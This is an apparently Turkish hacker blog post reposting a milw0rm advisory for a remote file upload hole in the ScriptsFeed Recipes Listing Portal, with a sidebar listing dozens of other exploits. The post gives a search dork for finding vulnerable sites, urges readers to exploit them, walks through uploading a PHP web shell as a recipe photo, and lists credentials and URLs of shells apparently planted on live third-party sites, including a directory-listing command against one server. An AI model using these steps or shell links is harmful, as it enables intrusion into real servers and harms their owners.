ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7112
Discovered By: ZoRLu
dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
skip to main |
skip to sidebar
"Şeytan İçinde ki Sestir; O Sese Kulak Ver"-Zorlu BUĞRAHAN-
About Me
Blog Archive
-
▼
2008
(193)
-
▼
Kasım
(62)
- Star Articles 6.0 Remote File Upload Vulnerability
- Kurtlar Vadisi Pusu 48. Bölüm Fragman
- FAQ Manager 1.2 (config_path) Remote File Inclusio...
- Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple R...
- Chipmunk Topsites (Auth Bypass/XSS) Multiple Remot...
- Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusi...
- Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerab...
- PG Job Site (poll_view_id) Blind SQL Injection Vul...
- PG Roomate Finder Solution (Auth Bypass) SQL Injec...
- PG Real Estate (Auth Bypass) SQL Injection Vulnera...
- lütfen demoları hacklemeyin - pls you dont make ha...
- getaphpsite Auto Dealers Remote File Upload Vulner...
- getaphpsite Real Estate Remote File Upload Vulnera...
- zehir4.asp download
- Kurtlar Vadisi Pusu 47. Bölüm Fragman
- Jadu Galaxies (categoryID) Blind SQL Injection Vul...
- mola : (
- turnkeyforms Text Link Sales (id) XSS/SQL Injectio...
- X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerab...
- GS Real Estate Portal US/International Module Mult...
- netcat download
- BosClassifieds hack video
- bu fakelerin modası geçmedi mi henüz : )
- ScriptsFeed (SF) Real Estate Classifieds Software ...
- ScriptsFeed (SF) Auto Classifieds Software Remote ...
- ScriptsFeed (SF) Recipes Listing Portal Remote Fil...
- Kurtlar Vadisi Pusu 46. Bölüm Fragman
- AlstraSoft Web Host Directory (Auth Bypass) SQL In...
- AlstraSoft Article Manager Pro (Auth Bypass) SQL I...
- AlstraSoft SendIt Pro Remote File Upload Vulnerabi...
- a.q gecenin bu saatinde ödev hazırlıyorum : (
- PHPStore Real Estate Remote File Upload Vulnerability
- PHPStore Complete Classifieds Script File Upload V...
- PHPStore PHP Job Search Script Remote File Upload ...
- PHPStore Car Dealers Remote File Upload Vulnerability
- Galatasaray - fenerbahçe 4-1
- Ali Kınık - Asın Beni
- ZEEJOBSITE 2.0 Remote File Upload Vulnerability
- zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulne...
- DeltaScripts PHP Classifieds <= 7.5 SQL Injection ...
- MyioSoft EasyCalendar (Auth Bypass) Remote SQL Inj...
- MyioSoft EasyBookMarker (Auth Bypass) SQL Injectio...
- MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injecti...
- Güneşin Oğlu Fragman
- E-topbiz Online Store 1 (Auth Bypass) SQL Injectio...
- DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Inject...
- DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL In...
- DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) ...
- kurtlar vadisi pusu 45. bölüm fragman şükür kavuşt...
- kpss çalışcam a.q kpss : (
- online rekorunu bugün kırdı sitem :)
- Apoll 0.7b (SQL Injection) Remote Auth Bypass Vuln...
- MatPo Link 1.2b (view.php id) Remote SQL Injection...
- BosDev BosClassifieds (cat_id) SQL Injection Vulne...
- Joovili 3.1.4 Insecure Cookie Handling Vulnerability
- Apartment Search Script (RFU/XSS) Multiple Remote ...
- Article Publisher PRO 1.5 Insecure Cookie Handling...
- SFS EZ Webstore (where) Remote SQL Injection Vulne...
- SFS EZ Gaming Cheats (id) Remote SQL Injection vul...
- eskişehir fenerbahçe maç bitti 2-2
- eskişehir fenerbahçe maçı
- Logz podcast CMS 1.3.1 (add_url.php art) SQL Injec...
-
▼
Kasım
(62)
İzleyiciler
zorlu kimdir? züktür et ;)
Bağlantılarım
-
Inj3ct0r.com
Copyright © ZoRLu | ZRL | Buffer Overflow. All rights reserved.
Blogger templates created by Templates Block
Wordpress theme by Dieter Schneider
Blogger templates created by Templates Block
Wordpress theme by Dieter Schneider
0 yorum:
Yorum Gönder